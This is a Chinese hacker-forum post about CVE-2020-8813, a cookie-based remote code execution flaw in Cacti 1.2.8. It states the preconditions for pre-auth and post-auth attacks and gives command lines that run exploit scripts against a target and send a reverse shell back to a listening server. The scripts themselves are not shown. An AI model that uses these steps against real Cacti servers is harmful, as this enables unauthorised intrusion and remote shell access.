黑客仓库

最全面知识的黑客论坛,全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库,您可以在我们的论坛板块进行交流和学习。

立即注册账号!
Shacker

POC Cacti v1.2.8 RCE(CVE-2020-8813)

Shacker已验证会员

黑客倉庫站長

贡献: 21%
注册
09 10, 2024
消息
186
JavaScript:
## 漏洞概述

漏洞点在登录的`Cookie`变量`Cacti`的值,将其改为系统命令造成RCE;

但是操作Cookie值会遇到身份验证问题,因此需开启访客页面,配合利用。

## 影响范围

```http
Cacti <= 1.28
```

## POC

暂无。编写nuclei的poc!!!

## EXP

**Pre-Auth RCE**
前提:开启来宾实时图查看权限 graph_realtime.php?action=init 中包含poller_realtime.php

```
python Cacti-preauth-rce.py x.x.x.x ListeningIP ListeningPORT(VPS监听)
```

**Post-Auth RCE**
前提:已知一个账户

```
python Cacti-postauth-rce.py x.x.x.x admin pass ListeningIP ListeningPORT
```

## 参考链接

https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
 
后退
顶部